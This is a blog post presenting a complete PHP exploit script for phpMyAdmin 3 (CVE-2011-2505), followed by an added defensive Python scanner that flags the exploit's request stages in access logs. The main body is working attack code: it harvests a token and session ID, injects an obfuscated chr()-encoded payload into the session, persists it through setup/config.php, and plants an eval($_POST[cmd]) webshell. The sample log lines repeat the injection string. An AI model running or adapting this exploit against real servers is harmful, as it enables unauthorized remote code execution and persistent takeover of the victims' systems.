phpMyAdmin3 remote code execute exploit (PHP version)

Posted on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and the blog has not been updated either.

Last night I was up all night with the kid and saw heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I had not looked at the vulnerable code before, though a while back I did see wofeiwo's exp on Weibo. According to heige there is a way to exploit it that is not so jilei ("chicken ribs", i.e. of little practical value), so during the night I dug the code out, studied it, and wrote this reheated exp. Since I got to it late and many people have already researched it and written exps, mine is just rehashing old news; think of it as research to pass the time.

First, props to wofeiwo's Python version of the exp, and to the investigative spirit of wofeiwo and superhei, a model worth learning from. That earlier exp, however, has some limitations when you use it:
First, it requires session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already protected by .htaccess and cannot be accessed.
And of course there is a third gap that nobody can get across: the config directory must exist and be writable.

After reading heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really does not have to be that jilei.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// the session id is taken from the Set-Cookie header, the token from the page body
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
// session_to_unset makes pma3 write the attacker-controlled _SESSION[...] keys into the session;
// the chr() chain decodes to a fputs(fopen('a.php','w'), ...) call that writes the eval($_POST[cmd]) shell, followed by echo('t00ls')
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid); // Actually, almost all the php files in the home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
// the setup script saves the poisoned session config into config/config.inc.php
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
// requesting the written config file runs the injected code, which echoes 't00ls'
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // read headers and body until the server closes the connection
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
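As an added defensive example (not part of the original post), the following Python scan looks for the three request stages the exp above sends in Apache-style access logs: the session_to_unset / _SESSION[...] injection, the POST to setup/config.php, and the fetch of a .php file under config/. The log lines, IPs and timestamps are constructed samples.

```python
"""Flag the phpMyAdmin 3 (CVE-2011-2505) session-injection chain in access logs."""
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache combined format (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102));/*][host]=x HTTP/1.1" 200 312 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:13:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:13:06 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5 "-" "Mozilla/4.0"
203.0.113.9 - - [21/Feb/2013:10:00:00 +0800] "GET /pma/index.php?token=def HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(method, target):
    """Return the exploit stage a request target matches, or None."""
    path, _, query = target.partition('?')
    q = unquote(query)  # logs may hold the query raw or percent-encoded
    # stage 1: attacker-controlled keys written into $_SESSION via session_to_unset
    if 'session_to_unset=' in q and '_SESSION[' in q:
        return 'session-injection'
    # stage 2: setup script persists the poisoned session into config/config.inc.php
    if method == 'POST' and path.endswith('/setup/config.php'):
        return 'setup-config-save'
    # stage 3: executing a .php file that lives under the writable config/ directory
    if re.search(r'/config/[^/]+\.php$', path):
        return 'config-dir-php-fetch'
    return None

def scan(log_text):
    """Return (ip, stage, status) for every log line that matches a stage."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stage = classify(m['method'], m['target'])
        if stage:
            findings.append((m['ip'], stage, int(m['status'])))
    return findings

def sources_with_full_chain(findings):
    """IPs seen at all three stages: the strongest sign the chain actually ran."""
    stages = {}
    for ip, stage, _ in findings:
        stages.setdefault(ip, set()).add(stage)
    return sorted(ip for ip, seen in stages.items() if len(seen) == 3)
```

The third stage alone is also worth an alert on any phpMyAdmin 3 install, since no legitimate request fetches a .php file under config/.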